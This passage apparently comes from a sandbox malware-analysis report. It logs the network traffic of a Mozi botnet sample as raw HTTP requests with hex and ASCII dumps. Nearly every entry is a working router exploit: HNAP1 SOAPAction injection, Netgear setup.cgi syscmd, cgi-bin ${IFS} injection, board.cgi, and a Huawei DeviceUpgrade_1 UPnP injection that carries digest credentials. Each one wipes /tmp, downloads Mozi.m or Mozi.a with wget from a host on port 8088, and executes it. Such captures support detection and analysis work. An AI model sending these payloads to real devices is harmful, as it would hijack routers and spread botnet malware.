2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 120.231.177.238:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 60.47.9.239:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 104.26.240.22:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 111.236.18.200:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 218.232.108.182:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 206.139.158.36:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 148.33.17.220:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 53.31.107.240:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 